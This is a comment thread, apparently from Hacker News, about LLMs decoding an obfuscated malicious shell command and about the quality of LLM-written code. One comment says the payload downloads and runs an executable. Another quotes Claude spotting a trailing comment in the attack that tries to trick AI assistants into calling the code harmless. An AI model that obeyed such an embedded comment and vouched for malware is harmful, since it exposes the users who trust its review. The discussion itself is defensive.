(no title)
notRobot | 4 months ago
Before LLMs if someone wasn't familiar with deobfuscation they would have no easy way to analyse the attack string as they were able to do here.
notRobot | 4 months ago
Before LLMs if someone wasn't familiar with deobfuscation they would have no easy way to analyse the attack string as they were able to do here.
spartanatreyu|4 months ago
Absolutely not.
I just wasted 4 hours trying to debug an issue because a developer decided they would shortcut things and use an LLM to add just one more feature to an existing project. The LLM had changed the code in a non-obvious way to refer to things by ID, but the data source doesn't have IDs in it which broke everything.
I had to instrument everything to find where the problem actually was.
As soon as I saw it was referring to things that don't exist I realised it was created by an LLM instead of a developer.
LLMs can only create convincing looking code. They don't actually understand what they are writing, they are just mimicking what they've seen before.
If they did have the capacity to understand, I wouldn't have lost those 4 hours debugging its approximation of code.
Now I'm trying to figure out if I should hash each chunk of data into an ID and bolt it onto the data chunk, or if I should just rip out the feature and make it myself.
sublinear|4 months ago
Legend2440|4 months ago
unknown|4 months ago
[deleted]
nijave|4 months ago
thaumasiotes|4 months ago
Decoded:
This isn't exactly obfuscated. Download an executable file, make it executable, and then execute it.James_K|4 months ago
evan_|4 months ago
Claude reported basically the same thing from the blog post, but included an extra note:
> The comment at the end trying to trick me into saying it's harmless is part of the attack - it's attempting to manipulate AI assistants into vouching for malicious code.
dr-detroit|4 months ago
xboxnolifes|4 months ago
croes|4 months ago
The command even mentions base64.
What if ChatGPT said everything is fine?
Arainach|4 months ago
I'm very much an AI skeptic, but it's undeniable that LLMs have obsoleted 30 years worth of bash scripting knowledge - any time I think "I could take 5min and write that" an LLM can do it in under 30 seconds and adds a lot more input validation checks than I would in 5min. It also gets the regex right the first time, which is better than my grug brain for anything non-trivial.
lukeschlather|4 months ago
Maybe ChatGPT can execute malicious code but that also seems less likely to be my problem.
lynx97|4 months ago